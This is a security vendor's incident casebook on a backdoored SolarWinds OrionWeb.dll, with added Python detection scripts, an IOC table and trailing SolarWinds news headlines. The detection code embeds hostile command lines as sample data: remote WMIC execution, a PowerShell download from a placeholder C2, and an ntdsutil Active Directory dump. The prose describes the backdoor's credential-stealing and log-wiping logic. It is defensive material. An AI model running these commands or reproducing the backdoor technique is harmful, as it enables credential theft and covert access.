Solarwinds Sophos



Please note: Although elements of this story may seem connected to the recent SolarWinds Sunburst attack, we have not found any concrete evidence that these two incidents are related.

Customer profile: An internet service provider and telecommunications organization based in the USA with approximately 1700 devices.

The Sophos Managed Threat Response (MTR) team provides 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service. Sophos Rapid Response provides emergency remote incident response for active incidents.

Setting the scene

The organization in question came to Sophos Rapid Response after falling victim to a Ragnar Locker attack in early 2020. A ransomware payload was delivered manually by a highly capable group at around 2 a.m., while admins were asleep, hitting as many computers as they could in quick succession.


They hit hundreds.


Sophos Rapid Response was brought in to help identify, contain and neutralize the threat. It took the team less than two days to resolve the active threat, and over the following days incident responders were able to ascertain that the threat actor had entered the network two months prior to the ransomware attack.

With the Ragnar group removed from their network, the customer transitioned to the full MTR service in Notify mode with our security operations team watching over them 24/7.

While the pressing threat of Ragnar Locker was out of the picture, in November 2020 another threat actor stepped into view…

Sneaking over WMI

Increasingly, threat actors like to pack light when on a mission. They don’t bring their own tools and prefer to “live off the land.” They take advantage of capabilities built into operating systems, like Microsoft Windows, to evade detection.

Windows Management Instrumentation, or WMI for short, is a feature that enables remote management and automation of administrative tasks. It’s designed to ease the pains of managing large enterprise environments with an overwhelming number of computers.

But in the hands of a threat actor, WMI offers quite the rich toolbox to achieve a number of wide-ranging goals. And with WMIC, the command line interface for WMI, adversaries can write simple yet powerful one-line instructions.

For example, running Notepad on a remote computer:

Or listing all the local user accounts on a computer:

Hunting for abuse of WMI is essential, but discerning the difference between legitimate use of WMI and malicious use is no easy task, often requiring a keen eye towards the context of the commands. What commands came before? What commands came after? What is the intent?

These are the questions our MTR operators ask themselves as a number of suspicious-looking WMI commands are identified in the customer’s network, all taking place in quick succession, during a routine threat hunt alongside researchers from SophosLabs.

Hunting for threat actors

The threat hunters see the first red flag. WMIC was used to instruct remote computers to launch commands. This alone is suspicious, but where did the commands come from?

Looking at the hierarchy, wmic.exe was executed by cmd.exe, the Windows Command Prompt. And cmd.exe was executed by w3wp.exe, a worker process for Microsoft IIS – a web server.

A web server. Surely no measured admin would launch administrative commands to other servers from their own web server?

And what is going on in this command seen on the web server?

WMIC calls out to a remote computer, authenticated with credentials, to create a new process and execute a script called backup.bat. On its own, it’s not terribly suspicious. But given that this was initiated by a web server worker process, we need to dig deeper. What is backup.bat?

MTR finds another troubling command.

Combined with the context of the previous command, it is clearly suspicious to see PowerShell (another Microsoft task automation and configuration management tool) creating a WebClient to “downloadfile” a file called “update” from an unknown host.

Before continuing, an MTR operator sends the first notification to the customer and engages their admin team.

The operator shares the observed WMIC commands as well as the servers and users associated with the commands, with guidance to reset those user passwords and to use Sophos Intercept X to isolate the servers from the rest of the network. Additionally, that strange IP address needs blocking on their firewall.

On with the investigation.

Looking back in time to the preceding commands, the picture becomes clearer.

That’s no backup command. A .bat file is a Batch script, the classic way of bundling Windows commands together rather than running each by hand.

Echo typically prints a line of text to the screen (i.e. the command terminal); however, the > symbol is a redirect. Instead of writing the text mkdir … to the terminal, it writes that text to a file on a remote system.

The threat actor built a script on a remote computer. And they had run it.

First it creates a new “tmp” folder in the Windows temporary directory (where things are put when it doesn’t matter if they disappear later on). Next it uses ntdsutil.exe

To a veteran threat hunter, the threat actor’s goal is clear.

Credential access to elevate privileges

Ntdsutil is short for NT Directory Services Utility. It is a tool for interacting with Active Directory servers, Microsoft’s centralized suite of technologies responsible for authenticating and authorizing users and computers in a Windows domain.

The arguments 'ac i ntds' ifm 'create full …' write a full dump, a copy, of the entire Active Directory database. This is intended for the legitimate purpose of domain controller deployment using the “install from media” option.

This actor tried to get their hands on credentials, and that variant of the command is often used by threat actors who have access to the domain controller but don’t yet have domain admin credentials.

They tried to elevate privileges. And they were caught red-handed.
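The lineage and command-line checks described above (WMIC launched by cmd.exe under the IIS worker w3wp.exe, the PowerShell download, and the ntdsutil “install from media” dump) can be expressed as a small hunt over process-creation telemetry. The code below is an added example, not Sophos code and not the customer’s telemetry: it walks constructed process events, flags shells that descend from w3wp.exe, and matches the remote WMIC, PowerShell download and ntdsutil IFM command patterns. Host names, user names, pids, the C2_PLACEHOLDER host and the simplified parent chain are assumptions; the rule identifiers are the ATT&CK IDs from the table at the end of this article.

```python
import re

# Constructed sample of process-creation telemetry (not real customer data). Each record
# carries the fields an EDR sensor records: pid, parent pid, image path and command line.
# Events from the web server and from a domain controller are merged into one list, so
# one parent (pid 3000) is deliberately absent to show that the chain walk tolerates gaps.
SAMPLE_EVENTS = [
    {"pid": 4,    "ppid": 0,    "image": "System",                                "cmdline": ""},
    {"pid": 880,  "ppid": 4,    "image": r"C:\Windows\System32\services.exe",      "cmdline": "services.exe"},
    # IIS worker process hosting the Orion web application
    {"pid": 1000, "ppid": 880,  "image": r"C:\Windows\System32\inetsrv\w3wp.exe",  "cmdline": 'w3wp.exe -ap "OrionWeb"'},
    {"pid": 1200, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe",           "cmdline": "cmd.exe /c ..."},
    {"pid": 1300, "ppid": 1200, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic /node:DC01 /user:CORP\svc_backup process call create "cmd /c C:\Windows\Temp\tmp\backup.bat"'},
    {"pid": 1400, "ppid": 1200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell (new-object net.webclient).downloadfile('http://C2_PLACEHOLDER:8090/update','update')"},
    # An administrator running the same tool from an interactive session (lineage simplified)
    {"pid": 2000, "ppid": 880,  "image": r"C:\Windows\explorer.exe",               "cmdline": "explorer.exe"},
    {"pid": 2100, "ppid": 2000, "image": r"C:\Windows\System32\cmd.exe",           "cmdline": "cmd.exe"},
    {"pid": 2200, "ppid": 2100, "image": r"C:\Windows\System32\wbem\WMIC.exe",     "cmdline": "wmic useraccount list brief"},
    # On the domain controller: the IFM dump that backup.bat launched
    {"pid": 3100, "ppid": 3000, "image": r"C:\Windows\System32\ntdsutil.exe",
     "cmdline": r'ntdsutil "ac i ntds" ifm "create full C:\Windows\Temp\tmp" q q'},
]

SHELLS = {"cmd.exe", "powershell.exe", "wmic.exe"}
WEB_WORKER = "w3wp.exe"


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(pid, by_pid):
    """Yield image basenames of pid's parent, grandparent, ... until the chain ends or loops."""
    seen = set()
    ev = by_pid.get(pid)
    while ev and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        ev = by_pid[ev["ppid"]]
        yield basename(ev["image"])


def hunt(events):
    """Return (pid, attack_id, reason) findings for the rules this casebook describes."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        cmd = e["cmdline"].lower()
        # Rule 1: a shell or WMIC whose parent chain runs back to the IIS worker process
        if name in SHELLS and WEB_WORKER in ancestry(e["pid"], by_pid):
            findings.append((e["pid"], "T1505.003", f"{name} descends from IIS worker {WEB_WORKER}"))
        # Rule 2: WMIC creating a process on another host
        if name == "wmic.exe" and "/node:" in cmd and "process call create" in cmd:
            findings.append((e["pid"], "T1047", "WMIC remote process creation"))
        # Rule 3: PowerShell WebClient download
        if name == "powershell.exe" and "downloadfile" in cmd:
            findings.append((e["pid"], "T1059.001", "PowerShell WebClient DownloadFile"))
        # Rule 4: ntdsutil "install from media" full dump of the directory database
        if name == "ntdsutil.exe" and re.search(r"\bifm\b", cmd) and "create full" in cmd:
            findings.append((e["pid"], "T1003.003", "ntdsutil IFM dump of the Active Directory database"))
    return findings


if __name__ == "__main__":
    for pid, attack_id, reason in hunt(SAMPLE_EVENTS):
        print(f"pid {pid}: {attack_id} {reason}")
```

In the sample, the administrator’s interactive `wmic useraccount list brief` (pid 2200) produces no finding because nothing in its parent chain is w3wp.exe and it creates no remote process, which is the context-over-command point the passage makes. Real sensors reuse pids, so key the chain walk on a process GUID or (pid, start time) pair rather than the bare pid used here.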

An operator gets back in touch with the customer to fill them in with the latest discoveries. The customer initiates domain-wide password resets. Better to be safe than sorry.

With the malicious IP blocked, all passwords reset, and those servers isolated, the threat actor is dead in the water.

But it is still a mystery how they orchestrated these commands. Where is the initial point of entry?

What did they do on that webserver?

Web shells

Public webservers are inherently risky. Not only do they face the internet, making them a prime target for an adversary’s initial intrusion into an organization’s network, but it’s also normal for them to communicate with a wide range of IP addresses never seen before.

All that web traffic, all that noise, makes web servers a wonderful place to hide and launch commands. Only a keen eye will spot that needle amongst the hay. Especially if you’re only looking at network traffic.

Thankfully, MTR collects endpoint telemetry as well as network telemetry, providing rich data to contextualize anything that might be found.

Looking over all the commands the threat actor ran on the server, a pattern emerges.

This command called out to a remote server to copy a file called big.fm from the tmp directory we saw earlier. Sadly, “Big FM” is not the name of the threat actor’s favorite Top 40 radio station, it’s what the threat actor named the Active Directory database dump.

What sticks out in this command, and many others they ran, is they only copied files to a particular folder on the webserver inside f:\sites. Almost as if this was the only folder they had permissions to access. A folder where the website code resides.

This smells like a web shell.

Looking inside f:\sites our MTR operator finds a lonely-looking file called about.aspx. An Active Server Page Extended (ASPX) file is a page of Microsoft’s ASP.NET framework for writing dynamic websites. Taking a look over the code, our operator observes that the web page will receive encoded web requests and send the decoded request to cmd.exe, the Windows command prompt.

This is a web shell.

But why wasn’t it detected earlier?

Grabbing a copy of the file, MTR sends this immediately to SophosLabs for deeper analysis. Even as the file passes through our automated analysis systems, it’s clear this web shell variant has never been seen before. SophosLabs researchers quickly tear it apart and publish detections for this new variant, protecting all our customers around the globe from this web shell should it be used again.

At the time of writing this article we are the only vendor with a detection published for this web shell variant (detected as Troj/WebShel-H). The file hash is in the IOCs table at the bottom of this article.

With the web shell neutralized (hopefully along with the threat actor’s access), our operators move their focus to answering several important questions: Where did this web shell come from? What else was it used for? And what was the file update that the threat actor downloaded?

OrionWeb.dll

Scouring historic telemetry gathered by MTR since the service’s technology was deployed shows no signs of when the web shell was installed. Plenty of file accesses and timestamp modifications are observed, but it’s clear the web shell was deployed before Rapid Response had been engaged and our telemetry collection began.

This is a dead end.

Looking at what events preceded the download of the file update proves more fruitful, albeit concerning: it includes another request to a different C2, http://216[.]243.39.167:8090/, to fetch another version of the file.

The following command is observed:

Whatever “update” is, it has been used to replace a component of SolarWinds Orion called OrionWeb.dll.

Time to investigate this DLL.

DLLs are dynamic-link libraries, bundles of executable code that are called upon by applications, implementing various features and capabilities of an application. One can’t simply swap out a DLL with something completely different without causing an application to crash or throw lots of errors.

This needs expert eyes to investigate. MTR shares a sample with SophosLabs for reverse engineering and analysis.

This sample is not cryptographically signed, which is odd for a DLL purporting to be from a reputable vendor.

Digital signatures are a vital part of the trust model for Microsoft Windows. By using strong cryptography, these signatures establish both the authenticity of a file, confirming it is from who it says it is from, and the integrity of a file, confirming it has not been modified or corrupted in some way.

If someone were to modify this DLL, the digital signature would no longer validate the file integrity. But if the signature is entirely removed, there’s nothing to use to validate the file integrity at all.

MTR compares the file to a known-good copy of OrionWeb.dll and it is clear this file was and should be signed. Who removed the signature? And why?
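The comparison MTR performed here (is the DLL signed at all, and does it match a known-good copy or a known-bad hash?) can be scripted for triage of collected samples. The code below is an added example, not SophosLabs tooling: it parses the PE headers to see whether the Authenticode certificate table is present, hashes the file, and checks it against the backdoored OrionWeb.dll hash from the IOC table at the end of this article and against a known-good digest. `build_minimal_pe` constructs header-only sample images for the demonstration; the certificate offset and size it writes are assumptions and the images are not loadable binaries.

```python
import hashlib
import struct

# IMAGE_DIRECTORY_ENTRY_SECURITY: the data directory that points at the Authenticode certificate table
SECURITY_DIRECTORY = 4
# SHA256 of the backdoored OrionWeb.dll, from the casebook's IOC table
KNOWN_BAD_SHA256 = {"a25fc5af86296dcd5bb41668443a36947bccd17a1687f9b118675f1503b3e376": "backdoored OrionWeb.dll"}


def security_directory(data):
    """Return (offset, size) of the certificate table, or None when data is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    try:
        coff = e_lfanew + 4                          # COFF file header follows the PE signature
        opt_size = struct.unpack_from("<H", data, coff + 16)[0]
        opt = coff + 20                              # optional header follows the 20-byte COFF header
        magic = struct.unpack_from("<H", data, opt)[0]
        if magic == 0x10B:                           # PE32: data directories start 96 bytes in
            directories = opt + 96
        elif magic == 0x20B:                         # PE32+: data directories start 112 bytes in
            directories = opt + 112
        else:
            return None
        entry = directories + SECURITY_DIRECTORY * 8
        if entry + 8 > opt + opt_size:               # header declares fewer directories than that
            return (0, 0)
        return struct.unpack_from("<II", data, entry)
    except struct.error:                             # truncated header
        return None


def has_certificate_table(data):
    """True when the PE carries a non-empty Authenticode certificate table."""
    d = security_directory(data)
    return d is not None and d[1] > 0


def assess_assembly(data, known_good_sha256=None):
    """Triage a DLL: known-bad hash, missing certificate table, drift from a known-good copy."""
    digest = hashlib.sha256(data).hexdigest()
    findings = []
    if digest in KNOWN_BAD_SHA256:
        findings.append("matches IOC: " + KNOWN_BAD_SHA256[digest])
    if not has_certificate_table(data):
        findings.append("no Authenticode certificate table (file is unsigned or signature stripped)")
    if known_good_sha256 and digest != known_good_sha256.lower():
        findings.append("differs from known-good copy")
    return digest, findings


def build_minimal_pe(signed):
    """Construct a header-only PE32+ image (sample input, not loadable), with or without a certificate table."""
    opt_size = 240                                   # PE32+ optional header with all 16 data directories
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew: PE signature right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, opt_size, 0x2022)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)            # PE32+ magic
    if signed:
        # constructed offset/size of the certificate table; a real file points at a WIN_CERTIFICATE blob
        struct.pack_into("<II", opt, 112 + SECURITY_DIRECTORY * 8, 0x2000, 0x1000)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    good_digest, _ = assess_assembly(build_minimal_pe(True))
    print(assess_assembly(build_minimal_pe(False), known_good_sha256=good_digest))
```

Presence of a certificate table is only the first question; a table can hold a broken or untrusted signature. On a Windows host, `Get-AuthenticodeSignature` or `signtool verify /pa` validates the signature and its chain, which is the check to run once this triage says a table is there.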

OrionWeb.dll is a .NET assembly, written in C# (pronounced “C sharp”). C# is a Microsoft programming language that can easily take advantage of the capabilities of the .NET (“dotNET”) framework, and .NET is Microsoft’s powerful framework for writing applications for their platforms and interfacing with various Microsoft technologies.

One of the benefits of .NET assemblies is that they can be debugged and modified far easier than traditional compiled executables. One can open them up in a variety of tools like dnSpy and read and change the code they contain.

SophosLabs fully decompile the suspicious DLL and compare it to a known-good sample using the popular diff application WinMerge, a tool that enables file comparison and highlights the differences between them.

But as SophosLabs begin to dig into what had been changed, the changes seem incredibly minor. For instance, where the class of code LdapAuthentication previously inherited the other classes ILdapAuthentication and IDisposable in that order, the order was reversed in the suspicious sample.

Reviewing many of the other classes of code in the files, this same pattern of change is observed – parameters swapped around for no obvious reason. Anyone quick to run their eye over these changes would rightfully assume that the software developer has just refactored (i.e. reorganized) their code and nothing suspicious or malicious is present.

Yet given the context of how this file was discovered, SophosLabs and our operators push on with analyzing the sample to try and discover why this different DLL is so important to them that they needed to replace the original with it.

Eventually a discovery is made in the ValidateUser function (in SolarWinds.Orion.Web.OrionMembershipProvider). A chunk of code has been inserted. And it completely changes the behavior of the function.

This SolarWinds Orion server was backdoored!

A Hidden Backdoor

The original ValidateUser function was quite simple – it would be called with a username and password and then, behind the scenes, it would call another function called InternalValidateUser that would do the heavy lifting of authenticating the user.

However, the actor behind this threat added a lot of extra logic to the ValidateUser function.

First, a try/catch pattern was inserted on lines 5 and 54 with the catch block empty. This pattern ensures that any errors that may occur in the try block are suppressed and don’t cause the whole application to crash or print out errors that may reveal something is awry.

Next, a StreamWriter was added on line 7 which would write text to a seemingly randomly named file in the C:\Users\Default\AppData\Local\Temp directory. Any provided username and password would be written to the file, encrypted with a simple binary XOR-and-addition cipher with hard-coded keys.

The adversary wanted to continuously capture a stream of valid usernames and passwords for SolarWinds Orion.

After that, a conditional if statement was inserted on line 21 which looked for when the provided username is _system. A username that did not exist in the application’s database. A username only the adversary would know about.

Within the if statement were several instructions to access the application’s SQL database and delete the audit logs that would have revealed any usage of this _system username. The threat actor clearly had knowledge of how OrionWeb functions and how best to cover their tracks.

A text string was then constructed on lines 57 and 58 from the number of days since the epoch, a fixed point in time from which dates are counted upwards; effectively this is the number of days since January 1st 1970. The prefix 80CD1DB_ and the suffix _0F90D2 are added around that number, e.g. 80CD1DB_42745_0F90D2.

But why would a dynamic text string be needed, one that changes every single day? The answer soon becomes clear.

The final modification was in the return statement on line 59.

The original statement would call the InternalValidateUser function. Inferring from the changes, this function would return either True or False (for a successful or unsuccessful authentication). Yet the adversary had added two additional ways for the ValidateUser function to return True: if the password is this dynamic text string, or if the username is “_system” and the password is also the dynamic text string.


The adversary implanted a custom, dynamic password and username that only they would know about and ensured their usage of these credentials would never end up in the SolarWinds Orion audit logs.

And then another malicious injection is found.

Lurking in the GetLdapIdentity function (in SolarWinds.Orion.Web.OrionMixedModeAuth), SophosLabs discover the following code:

Similar to the StreamWriter observed above, the functionality intercepts credentials as they are being used by the application and encrypts and writes them to another seemingly randomly named file. But this time the adversary is stealing LDAP, Lightweight Directory Access Protocol, credentials which are used for authenticating with directory services like Microsoft Active Directory.

The adversary wanted to continuously capture a stream of valid usernames and passwords for the customer’s domain, not just for SolarWinds Orion.

Thankfully, the affected hosts are already isolated. MTR confirms with the customer that these hosts are taken offline and are rebuilt to ensure no backdoor remains in their network.

The Big Picture

The sequence of events is now clear:

  • The threat actor gained access to the web server and installed a web shell to send commands and orchestrate the rest of the attack
  • A backdoored version of OrionWeb.dll was downloaded from their C2 server. Additional logic was added to authenticate the username “_system” with a dynamic password that would change every day and the digital signature of the file removed.
  • OrionWeb.dll was replaced with their backdoored version.
  • Discovery was performed and domain controllers accessed to create a full dump of Active Directory to use for privilege escalation or to exfiltrate.

Given the recent supply chain attack on SolarWinds, this attack is certainly of note. However, we could not identify concrete evidence that the two are connected. The C2s, web shell, and DLL used in this attack are not ones we have observed before, outside of this single incident, nor have we observed them used since.

This style of attack is not specific to SolarWinds Orion and does not rely upon the exploitation of a vulnerability in its code. A threat actor can reverse engineer and maliciously modify a .NET assembly using freely available tools with no requirement for source code access.

The threat actor behind this attack is clearly highly skilled and capable. Their playbook of identifying viable .NET assemblies to backdoor underlines the importance of threat hunting, as well as application allowlisting and file integrity monitoring (both available in Sophos Intercept X Advanced for Server).

We hope the details shared through this casebook as well as the IOAs and IOCs below enable threat hunters around the globe to look for similar malicious modifications of OrionWeb.dll and other .NET assemblies, which will aid in better protection for all.

Learn more


For more information on the Sophos MTR service visit our website or speak with a Sophos representative.

If you prefer to conduct your own threat hunts Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Start a 30-day no obligation trial today.

IOAs / IOCs

Description                         Indicator
Web shell SHA256 (about.aspx)       f39dc0dfd43477d65c1380a7cff89296ad72bfa7fc3afcfd8e294f195632030e
Sophos detection for web shell      Troj/WebShel-H
C2 URLs                             http://98.225.248.37:8090
                                    http://216.243.39.167:8090
C2 IPv4s                            98.225.248.37
                                    216.243.39.167
Backdoored OrionWeb.dll SHA256      a25fc5af86296dcd5bb41668443a36947bccd17a1687f9b118675f1503b3e376
Sophos detection for .dll           Mal/Generic-S + Troj/MSIL-QJK
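A sweep over the indicators in this table, as an added example (not Sophos tooling): it tiers connections in a constructed proxy log against the C2 addresses (high confidence) and against the non-standard port 8090 alone (low confidence, worth a look but expect legitimate hits), and matches SHA256 values from a file-inventory export against the two hashes above. The log format, source addresses, timestamps and inventory paths are assumptions; the hashes and C2 addresses are the ones from the table.

```python
import hashlib
import re
from urllib.parse import urlsplit

# Indicators copied from the IOC table above
C2_IPS = {"98.225.248.37", "216.243.39.167"}
C2_PORT = 8090
BAD_SHA256 = {
    "f39dc0dfd43477d65c1380a7cff89296ad72bfa7fc3afcfd8e294f195632030e": "about.aspx web shell (Troj/WebShel-H)",
    "a25fc5af86296dcd5bb41668443a36947bccd17a1687f9b118675f1503b3e376": "backdoored OrionWeb.dll",
}

# Constructed (hypothetical) proxy-log format: timestamp, source IP, destination IP:port, URL
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<dst>[\d.]+):(?P<port>\d+)\s+(?P<url>\S+)$")

# Constructed sample log lines; only the C2 address and port come from the casebook
SAMPLE_LOG = [
    "2020-11-20T02:13:05Z 10.0.0.15 216.243.39.167:8090 http://216.243.39.167:8090/update",
    "2020-11-20T02:14:11Z 10.0.0.15 192.0.2.50:443 https://updates.example.org/",
    "2020-11-20T02:15:40Z 10.0.0.22 192.0.2.10:8090 http://192.0.2.10:8090/api",
    "malformed line",
]


def classify_connection(line):
    """Return (confidence, reason) for one log line, or None if nothing matches."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    dst, port = m["dst"], int(m["port"])
    host = urlsplit(m["url"]).hostname or ""
    if dst in C2_IPS or host in C2_IPS:
        return ("high", f"traffic to known C2 {dst} (T1071.001)")
    if port == C2_PORT:
        return ("low", f"HTTP on non-standard port {port} to {dst} (T1571)")
    return None


def sweep_log(lines):
    """All lines that matched, paired with their classification."""
    return [(line, hit) for line in lines if (hit := classify_connection(line))]


def sha256_of(data):
    return hashlib.sha256(data).hexdigest()


def match_hash_inventory(rows):
    """rows: (path, sha256) pairs exported from an EDR or osquery file inventory; case-insensitive."""
    return [(path, BAD_SHA256[h.lower()]) for path, h in rows if h.lower() in BAD_SHA256]


# Constructed inventory rows: the first carries the real web-shell hash (upper-cased, as some
# exports emit it); the second is placeholder content that matches nothing.
SAMPLE_INVENTORY = [
    (r"F:\sites\orion\about.aspx", "F39DC0DFD43477D65C1380A7CFF89296AD72BFA7FC3AFCFD8E294F195632030E"),
    (r"C:\inetpub\SolarWinds\bin\OrionWeb.dll", sha256_of(b"constructed placeholder content")),
]

if __name__ == "__main__":
    for line, (confidence, reason) in sweep_log(SAMPLE_LOG):
        print(f"[{confidence}] {reason}: {line}")
    for path, label in match_hash_inventory(SAMPLE_INVENTORY):
        print(f"[high] {path}: {label}")
```

Treat the port-only tier as a pivot, not a verdict: the casebook's C2s happened to use 8090, but so do plenty of internal management consoles, so those hits need the endpoint context (which process made the connection) before anyone isolates a host.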

MITRE ATT&CK

ID              Tactic                Technique
T1047           Execution             Windows Management Instrumentation
T1059.001/.003  Execution             Command and Scripting Interpreter
T1505.003       Persistence           Server Software Component: Web Shell
T1554           Persistence           Compromise Client Software Binary
T1078.002       Privilege Escalation  Valid Accounts: Domain Accounts
T1070.004/.006  Defense Evasion       Indicator Removal on Host
T1003.003       Credential Access     OS Credential Dumping: NTDS
T1556           Credential Access     Modify Authentication Process
T1087.002       Discovery             Account Discovery: Domain Account
T1570           Lateral Movement      Lateral Tool Transfer
T1056.003       Collection            Input Capture: Web Portal Capture
T1071.001       Command and Control   Application Layer Protocol: Web Protocols
T1571           Command and Control   Non-Standard Port


Live Discover Query

Peter Mackenzie: In Sophos Rapid Response, we would use the query below to get started; this has 3 variables (begin, end, cmd) so you can set the date range you are looking at as well as the command you are looking for. For your example you might start by looking for the string: % wmic /user:'%”%

Allowing for a wildcard at the start and end, as well as for any username. This would likely bring back any results where wmic was being used with someone’s credentials. The query itself brings back lots of useful information from our journals, including when the file was created, and which user executed the command.

Acknowledgements

I would like to thank (in no particular order) Fraser Howard, Guido Denzler, Gabe Renfro, Jordon Carpenter, Tyler Wojcik, Jordan Konicki, Steven Lott, Mat Gangwer, Alemdar Halis, and Savio Lau for their efforts in detecting, investigating, and responding to this novel threat.

The manual supply chain attack against SolarWinds’ Orion network monitoring platform has sent shockwaves throughout the world, with suspected Russian government hackers gaining access to U.S. government agencies, critical infrastructure entities and private sector organizations.

The injecting of malicious code into Orion between March and June 2020 allowed hackers believed to be with the Russian intelligence service, or APT29, to compromise Microsoft and FireEye, as well as U.S. Departments of Defense, State, Treasury, Homeland Security and Commerce, according to reports from Reuters and others.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) ordered all federal civilian agencies Sunday to power down SolarWinds Orion products until all hacker-controlled accounts and identified persistence mechanisms have been removed. CISA said it has evidence of additional initial access vectors beyond SolarWinds Orion, but noted those other intrusion methods are still being investigated.

Michael Dell: Public Cloud Isn’t More Secure Than On-Premise
‘The things that led to a lot of these attacks are human-induced that can occur in a public cloud, can occur in a private cloud – it can occur anywhere,’ says Dell Technologies CEO Michael Dell.

Mimecast Axes SolarWinds Orion For Cisco NetFlow After Hack
Mimecast has decommissioned its SolarWinds Orion software and replaced it with a Cisco NetFlow monitoring system after hackers compromised a Mimecast certificate used for Microsoft authentication.

Microsoft’s Brad Smith Drags AWS, Google Over SolarWinds Response
‘There are other companies that... have not even alerted their customers or others that they were a victim of a SolarWinds-based attack. These are companies where their own infrastructure was used to launch the attack,’ says Microsoft’s Brad Smith.

AWS: SolarWinds Hackers Used Our Elastic Compute Cloud
‘The actors used EC2 just like they would use any server they could buy or use anywhere (on-premises or in the cloud). And, in fact, the actors did use several different service providers in this manner,’ AWS tells CRN.

SolarWinds To Spend Up To $25M On Security Following Attack
SolarWinds says the money will be put toward security initiatives as well as used to cover higher costs around both insurance and professional fees stemming from the massive cyberattack.

Partners: AWS Must Come Clean On Role In SolarWinds Hack
‘I do wonder whether AWS has made a judgment error in not coming out to publicly defend their position in this high-profile case with such far reaching consequences,’ says Karl Robinson of AWS partner Logicata.

10 Boldest Statements From The SolarWinds Senate Hearing
Senators and tech executives discussed how the SolarWinds hackers used AWS’ infrastructure, took advantage of Microsoft’s authentication process, dwelled in FireEye’s systems and remained undetected for months.

U.S. Senators: AWS Infrastructure Used In SolarWinds Attack
‘The operation we’ll be discussing today uses [Amazon’s] infrastructure, [and], at least in part, required it to be successful. Apparently they were too busy to discuss that here with us today,’ says Sen. Marco Rubio, R-Fla.

Solarwinds

U.S. Plans Russian Sanctions For SolarWinds Breach: Report
The Biden administration plans to classify the SolarWinds campaign as ‘indiscriminate’ and ‘disruptive’ to distinguish it from espionage activities the U.S. conducts against adversaries, The Washington Post reported.

Microsoft On-Premises Warning: Customers Must Protect Their Own Identity Infrastructure
‘We were also reminded of the importance of cloud technology over on-premises software. Cloud technologies like Microsoft 365, Azure and the additional premium layers of services available as part of these solutions improve a defender’s ability to protect their own environment,’ writes Vasu Jakkal, Microsoft’s corporate vice president of security, compliance and identity, in a blog post.

SolarWinds Hackers Kept Going After Microsoft Until January
The SolarWinds hackers first viewed a file in a Microsoft source repository in November, and were able to download source code for its Azure, Exchange and Intune cloud-based products.

SolarWinds MSP Building New IT Systems Prior To N-able Launch
‘As we look to design the new N-able systems, we‘re going to have the benefit of all that [threat actor] knowledge and these world class experts to help us design this,’ says SolarWinds MSP President John Pagliuca.

SolarWinds MSP Hunts For New Security Chief Following Split
‘Tim [Brown, VP of Security] has been a fantastic advisor to the 25,000 MSPs that we have. So, we’re bummed. But we understand. So, we’re looking to see if we can clone him,’ says SolarWinds MSP President John Pagliuca.

10 Bold Statements From SolarWinds MSP After The Orion Hack
From comments on switching up CEOs and weeks of silence to building new IT systems and giving MSPs free security products, here’s a look at 10 notable remarks made by SolarWinds MSP President John Pagliuca and VP of Security Tim Brown.

SolarWinds Hacked From Inside U.S., 100+ Orgs Compromised
‘As a country, we choose to have both privacy and security. [As a result], the intelligence community largely has no visibility into private sector networks,’ says Anne Neuberger, a top Biden administration cybersecurity official.

Microsoft: No Evidence SolarWinds Was Hacked Via Office 365
‘The wording of the SolarWinds 8K [regulatory] filing was unfortunately ambiguous, leading to erroneous interpretation and speculation, which is not supported by the results of our investigation,’ Microsoft said Thursday.

Alex Stamos Attributes SolarWinds Hack To Russian Intel Service
New SolarWinds consultant Alex Stamos says the Russian foreign intelligence service is responsible for the massive hacking effort, although SolarWinds itself isn’t attributing the attacks to a specific group or nation.

SolarWinds CEO Confirms Office 365 Email ‘Compromise’ Played Role In Broad Based Attack
SolarWinds CEO Sudhakar Ramakrishna has verified suspicious activity in its Office 365 environment, with a company email account compromised and used to access accounts of targeted SolarWinds staff in business and technical roles.

Mimecast To Lay Off 80 Workers Weeks After Disclosing Hack
Mimecast CEO Peter Bauer says cutting 4 percent of its workforce will help the company provide more resources to enterprises while leveraging automation and efficiency for mid-market and SMB customers.

Kevin Mandia: Discovering SolarWinds Hack ‘Validates Our Intelligence and Expertise’
‘This breach got everybody to recognize there‘s a way to compromise some of the most secure organizations on the planet in a surreptitious way, and that alarmed people,’ says FireEye CEO Kevin Mandia.

Chinese Hackers Exploit SolarWinds To Steal Federal Payroll Info: Report
Suspected Chinese hackers took advantage of another SolarWinds Orion vulnerability to spread across networks and break into computers at the National Finance Center and other U.S. agencies, Reuters said.

Sophos CEO Kris Hagerman’s 10 Boldest Remarks From Best Of Breed Virtual Winter 2021
From surging sales and profitability and securing the supply chain to combating complexity and doubling down on detection and response, here’s a look at 10 notable statements made by Sophos CEO Kris Hagerman.

SolarWinds Hack ‘One Of The Most Dramatic’ In Last Decade: Sophos CEO
‘You cannot think about your security only in the context of, ‘How well am I secured?’ You’ve got to go beyond that to say, ‘How well am I secured and how well am I securing everything that I connect to?’’ says Sophos CEO Kris Hagerman.

Fidelis Targeted By SolarWinds Hackers After Installing Orion
Fidelis Cybersecurity was a target of interest to the SolarWinds hackers after downloading an evaluation copy of trojanized SolarWinds Orion network monitoring software in May, the company disclosed Tuesday.

Mimecast Breach Linked To SolarWinds Hack, Allowed Cloud Services Access
